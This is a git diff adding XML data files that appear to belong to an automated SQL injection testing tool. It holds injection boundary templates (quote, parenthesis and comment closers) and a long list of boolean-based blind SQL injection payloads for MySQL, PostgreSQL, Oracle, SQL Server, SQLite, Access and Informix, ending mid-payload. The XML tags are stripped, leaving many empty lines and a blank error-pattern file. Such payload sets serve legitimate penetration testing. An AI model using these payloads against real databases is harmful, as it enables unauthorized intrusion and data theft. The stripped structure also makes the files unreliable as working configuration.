a/data/xml/banner/x-powered-by.xml b/data/xml/banner/x-powered-by.xml new file mode 100644 index 00000000000..f52fd9aad2a --- /dev/null +++ b/data/xml/banner/x-powered-by.xml @@ -0,0 +1,69 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/data/xml/boundaries.xml b/data/xml/boundaries.xml new file mode 100644 index 00000000000..ccf93177a58 --- /dev/null +++ b/data/xml/boundaries.xml @@ -0,0 +1,576 @@ + + + + + + + + 3 + 1 + 1,2 + 1 + ) + [GENERIC_SQL_COMMENT] + + + + 4 + 1 + 1,2 + 2 + ') + [GENERIC_SQL_COMMENT] + + + + 3 + 1,2,3 + 1,2 + 2 + ' + [GENERIC_SQL_COMMENT] + + + + 5 + 1 + 1,2 + 4 + " + [GENERIC_SQL_COMMENT] + + + + + + 1 + 1 + 1,2 + 1 + ) + AND ([RANDNUM]=[RANDNUM] + + + + 2 + 1 + 1,2 + 1 + )) + AND (([RANDNUM]=[RANDNUM] + + + + 3 + 1 + 1,2 + 1 + ))) + AND ((([RANDNUM]=[RANDNUM] + + + + 1 + 0 + 1,2,3 + 1 + + + + + + 1 + 1 + 1,2 + 2 + ') + AND ('[RANDSTR]'='[RANDSTR] + + + + 2 + 1 + 1,2 + 2 + ')) + AND (('[RANDSTR]'='[RANDSTR] + + + + 3 + 1 + 1,2 + 2 + '))) + AND ((('[RANDSTR]'='[RANDSTR] + + + + 1 + 1 + 1,2 + 2 + ' + AND '[RANDSTR]'='[RANDSTR] + + + + 2 + 1 + 1,2 + 3 + ') + AND ('[RANDSTR]' LIKE '[RANDSTR] + + + + 3 + 1 + 1,2 + 3 + ')) + AND (('[RANDSTR]' LIKE '[RANDSTR] + + + + 4 + 1 + 1,2 + 3 + '))) + AND ((('[RANDSTR]' LIKE '[RANDSTR] + + + + 2 + 1 + 1,2 + 3 + %' + AND '[RANDSTR]%'='[RANDSTR] + + + + 2 + 1 + 1,2 + 3 + ' + AND '[RANDSTR]' LIKE '[RANDSTR] + + + + 2 + 1 + 1,2 + 4 + ") + AND ("[RANDSTR]"="[RANDSTR] + + + + 3 + 1 + 1,2 + 4 + ")) + AND (("[RANDSTR]"="[RANDSTR] + + + + 4 + 1 + 1,2 + 4 + "))) + AND ((("[RANDSTR]"="[RANDSTR] + + + + 2 + 1 + 1,2 + 4 + " + AND "[RANDSTR]"="[RANDSTR] + + + + 3 + 1 + 1,2 + 5 + ") + AND ("[RANDSTR]" LIKE "[RANDSTR] + + + + 4 + 1 + 1,2 + 5 + ")) + AND (("[RANDSTR]" LIKE "[RANDSTR] + + + + 5 + 1 + 1,2 + 5 + "))) + AND ((("[RANDSTR]" LIKE "[RANDSTR] + + + + 3 + 1 + 1,2 + 5 + " + AND "[RANDSTR]" LIKE "[RANDSTR] + + + + 1 + 1 + 1,2 + 1 + + [GENERIC_SQL_COMMENT] + + + + 3 + 1 + 1,2 + 1 + + # [RANDSTR] + + + + + 3 + 1 + 1,2 + 2 + ' + OR '[RANDSTR1]'='[RANDSTR2] + + + + + + 5 + 9 + 1,2 + 2 + ') WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 5 + 9 + 1,2 + 2 + ") WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 4 + 9 + 1,2 + 1 + ) WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 4 + 9 + 1,2 + 2 + ' WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 5 + 9 + 1,2 + 4 + " WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 4 + 9 + 1,2 + 1 + WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 5 + 9 + 1 + 2 + '||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + )||' + + + + 5 + 9 + 1 + 2 + '||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM] + )||' + + + + 5 + 9 + 1 + 2 + '+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + )+' + + + + 5 + 9 + 1 + 2 + ||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM] + )|| + + + + 5 + 9 + 1 + 2 + ||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + )|| + + + + 5 + 9 + 1 + 1 + +(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + )+ + + + + 5 + 9 + 1 + 2 + '+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + )+' + + + + + + 5 + 1 + 1,2 + 2 + ')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 5 + 1 + 1,2 + 2 + ")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 5 + 1 + 1,2 + 1 + )) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 4 + 1 + 1,2 + 2 + ') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 5 + 1 + 1,2 + 4 + ") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 4 + 1 + 1,2 + 1 + ) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 4 + 1 + 1 + 1 + ` WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 5 + 1 + 1 + 1 + `) WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + + + 4 + 8 + 1 + 6 + `=`[ORIGINAL]` + AND `[ORIGINAL]`=`[ORIGINAL] + + + + 5 + 8 + 1 + 6 + "="[ORIGINAL]" + AND "[ORIGINAL]"="[ORIGINAL] + + + + 5 + 8 + 1 + 6 + ]-(SELECT 0 WHERE [RANDNUM]=[RANDNUM] + )|[[ORIGINAL] + + + + + 5 + 7 + 1 + 3 + [RANDSTR1], + [RANDSTR2] + + + + + 4 + 1 + 1 + 2 + ' IN BOOLEAN MODE) + # + + + diff --git a/data/xml/errors.xml b/data/xml/errors.xml new file mode 100644 index 00000000000..605ffacd9a9 --- /dev/null +++ b/data/xml/errors.xml @@ -0,0 +1,248 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/data/xml/payloads/boolean_blind.xml b/data/xml/payloads/boolean_blind.xml new file mode 100644 index 00000000000..0cf17140456 --- /dev/null +++ b/data/xml/payloads/boolean_blind.xml @@ -0,0 +1,1612 @@ + + + + + + + + AND boolean-based blind - WHERE or HAVING clause + 1 + 1 + 1 + 1,8,9 + 1 + AND [INFERENCE] + + AND [RANDNUM]=[RANDNUM] + + + AND [RANDNUM]=[RANDNUM1] + + + + + OR boolean-based blind - WHERE or HAVING clause + 1 + 1 + 3 + 1,9 + 2 + OR [INFERENCE] + + OR [RANDNUM]=[RANDNUM] + + + OR [RANDNUM]=[RANDNUM1] + + + + + OR boolean-based blind - WHERE or HAVING clause (NOT) + 1 + 3 + 3 + 1,9 + 1 + OR NOT [INFERENCE] + + OR NOT [RANDNUM]=[RANDNUM] + + + OR NOT [RANDNUM]=[RANDNUM1] + + + + + AND boolean-based blind - WHERE or HAVING clause (subquery - comment) + 1 + 2 + 1 + 1,8,9 + 1 + AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + [GENERIC_SQL_COMMENT] + + + AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + + + + OR boolean-based blind - WHERE or HAVING clause (subquery - comment) + 1 + 2 + 3 + 1,9 + 2 + OR [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + [GENERIC_SQL_COMMENT] + + + OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + + + + AND boolean-based blind - WHERE or HAVING clause (comment) + 1 + 2 + 1 + 1 + 1 + AND [INFERENCE] + + AND [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + AND [RANDNUM]=[RANDNUM1] + + + + + OR boolean-based blind - WHERE or HAVING clause (comment) + 1 + 2 + 3 + 1 + 2 + OR [INFERENCE] + + OR [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + OR [RANDNUM]=[RANDNUM1] + + + + + OR boolean-based blind - WHERE or HAVING clause (NOT - comment) + 1 + 4 + 3 + 1 + 1 + OR NOT [INFERENCE] + + OR NOT [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + OR NOT [RANDNUM]=[RANDNUM1] + + + + + AND boolean-based blind - WHERE or HAVING clause (MySQL comment) + 1 + 3 + 1 + 1 + 1 + AND [INFERENCE] + + AND [RANDNUM]=[RANDNUM] + # + + + AND [RANDNUM]=[RANDNUM1] + +
+ MySQL +
+
+ + + OR boolean-based blind - WHERE or HAVING clause (MySQL comment) + 1 + 3 + 3 + 1 + 2 + OR [INFERENCE] + + OR [RANDNUM]=[RANDNUM] + # + + + OR [RANDNUM]=[RANDNUM1] + +
+ MySQL +
+
+ + + OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) + 1 + 3 + 3 + 1 + 1 + OR NOT [INFERENCE] + + OR NOT [RANDNUM]=[RANDNUM] + # + + + OR NOT [RANDNUM]=[RANDNUM1] + +
+ MySQL +
+
+ + + AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment) + 1 + 3 + 1 + 1 + 1 + AND [INFERENCE] + + AND [RANDNUM]=[RANDNUM] + %16 + + + AND [RANDNUM]=[RANDNUM1] + +
+ Microsoft Access +
+
+ + + OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment) + 1 + 3 + 3 + 1 + 2 + OR [INFERENCE] + + OR [RANDNUM]=[RANDNUM] + %16 + + + OR [RANDNUM]=[RANDNUM1] + +
+ Microsoft Access +
+
+ + + MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause + 1 + 2 + 1 + 1,2,3 + 1 + RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) + + RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END)) + + + RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END)) + +
+ MySQL +
+
+ + + MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) + 1 + 3 + 1 + 1,2,3,8 + 1 + AND MAKE_SET([INFERENCE],[RANDNUM]) + + AND MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + AND MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL +
+
+ + + MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) + 1 + 3 + 3 + 1,2,3 + 2 + OR MAKE_SET([INFERENCE],[RANDNUM]) + + OR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + OR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL +
+
+ + + MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT) + 1 + 4 + 1 + 1,2,3,8 + 1 + AND ELT([INFERENCE],[RANDNUM]) + + AND ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + AND ELT([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL +
+
+ + + MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT) + 1 + 4 + 3 + 1,2,3 + 2 + OR ELT([INFERENCE],[RANDNUM]) + + OR ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + OR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL +
+
+ + + MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) + 1 + 5 + 1 + 1,2,3,8 + 1 + AND EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END) + + AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END) + + + AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END) + +
+ MySQL +
+
+ + + MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) + 1 + 5 + 3 + 1,2,3,8 + 2 + OR EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END) + + OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END) + + + OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END) + +
+ MySQL +
+
+ + + PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST) + 1 + 2 + 1 + 1,8 + 1 + AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL + + AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL + + + AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL + +
+ PostgreSQL +
+
+ + + PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST) + 1 + 3 + 3 + 1 + 2 + OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL + + OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL + + + OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL + +
+ PostgreSQL +
+
+ + + Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) + 1 + 2 + 1 + 1 + 1 + AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL + + AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL + + + AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL + +
+ Oracle +
+
+ + + Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) + 1 + 3 + 3 + 1 + 2 + OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL + + OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL + + + OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL + +
+ Oracle +
+
+ + + SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON) + 1 + 2 + 1 + 1 + 1 + AND CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + + AND CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + + + AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + +
+ SQLite +
+
+ + + SQLite OR boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON) + 1 + 3 + 3 + 1 + 2 + OR CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + + OR CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + + + OR CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + +
+ SQLite +
+
+ + + + + + Boolean-based blind - Parameter replace (original value) + 1 + 1 + 1 + 1,2,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + + + + MySQL boolean-based blind - Parameter replace (MAKE_SET) + 1 + 4 + 1 + 1,2,3 + 3 + MAKE_SET([INFERENCE],[RANDNUM]) + + MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL +
+
+ + + MySQL boolean-based blind - Parameter replace (MAKE_SET - original value) + 1 + 5 + 1 + 1,2,3 + 3 + MAKE_SET([INFERENCE],[ORIGVALUE]) + + MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE]) + + + MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE]) + +
+ MySQL +
+
+ + + MySQL boolean-based blind - Parameter replace (ELT) + 1 + 4 + 1 + 1,2,3 + 3 + ELT([INFERENCE],[RANDNUM]) + + ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + ELT([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL +
+
+ + + MySQL boolean-based blind - Parameter replace (ELT - original value) + 1 + 5 + 1 + 1,2,3 + 3 + ELT([INFERENCE],[ORIGVALUE]) + + ELT([RANDNUM]=[RANDNUM],[ORIGVALUE]) + + + ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE]) + +
+ MySQL +
+
+ + + MySQL boolean-based blind - Parameter replace (bool*int) + 1 + 4 + 1 + 1,2,3 + 3 + ([INFERENCE])*[RANDNUM] + + ([RANDNUM]=[RANDNUM])*[RANDNUM1] + + + ([RANDNUM]=[RANDNUM1])*[RANDNUM1] + +
+ MySQL +
+
+ + + MySQL boolean-based blind - Parameter replace (bool*int - original value) + 1 + 5 + 1 + 1,2,3 + 3 + ([INFERENCE])*[ORIGVALUE] + + ([RANDNUM]=[RANDNUM])*[ORIGVALUE] + + + ([RANDNUM]=[RANDNUM1])*[ORIGVALUE] + +
+ MySQL +
+
+ + + PostgreSQL boolean-based blind - Parameter replace + 1 + 3 + 1 + 1,2,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) + +
+ PostgreSQL +
+
+ + + PostgreSQL boolean-based blind - Parameter replace (original value) + 1 + 4 + 1 + 1,2,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + +
+ PostgreSQL +
+
+ + + + PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES) + 1 + 5 + 1 + 1,2,3 + 3 + (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) + + (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) + + + (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1) + +
+ PostgreSQL +
+
+ + + + PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value) + 1 + 5 + 1 + 1,2,3 + 3 + (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) + + (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) + + + (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1) + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase boolean-based blind - Parameter replace + 1 + 3 + 1 + 1,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value) + 1 + 4 + 1 + 1,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle boolean-based blind - Parameter replace + 1 + 3 + 1 + 1,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + +
+ Oracle +
+
+ + + Oracle boolean-based blind - Parameter replace (original value) + 1 + 4 + 1 + 1,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + +
+ Oracle +
+
+ + + Informix boolean-based blind - Parameter replace + 1 + 3 + 1 + 1,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL) + +
+ Informix +
+
+ + + Informix boolean-based blind - Parameter replace (original value) + 1 + 4 + 1 + 1,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL) + +
+ Informix +
+
+ + + Microsoft Access boolean-based blind - Parameter replace + 1 + 3 + 1 + 1,3 + 3 + IIF([INFERENCE],[RANDNUM],1/0) + + IIF([RANDNUM]=[RANDNUM],[RANDNUM],1/0) + + + IIF([RANDNUM]=[RANDNUM1],[RANDNUM],1/0) + +
+ Microsoft Access +
+
+ + + Microsoft Access boolean-based blind - Parameter replace (original value) + 1 + 4 + 1 + 1,3 + 3 + IIF([INFERENCE],[ORIGVALUE],1/0) + + IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) + + + IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0) + +
+ Microsoft Access +
+
+ + + + Boolean-based blind - Parameter replace (DUAL) + 1 + 2 + 1 + 1,2,3 + 3 + (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) + + (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) + + + (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) + + + + + Boolean-based blind - Parameter replace (DUAL - original value) + 1 + 3 + 1 + 1,2,3 + 3 + (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) + + (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) + + + (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) + + + + + + + Boolean-based blind - Parameter replace (CASE) + 1 + 2 + 1 + 1,3 + 3 + (CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END) + + (CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END) + + + (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END) + + + + + Boolean-based blind - Parameter replace (CASE - original value) + 1 + 3 + 1 + 1,3 + 3 + (CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END) + + (CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END) + + + (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END) + + + + + + + MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause + 1 + 2 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 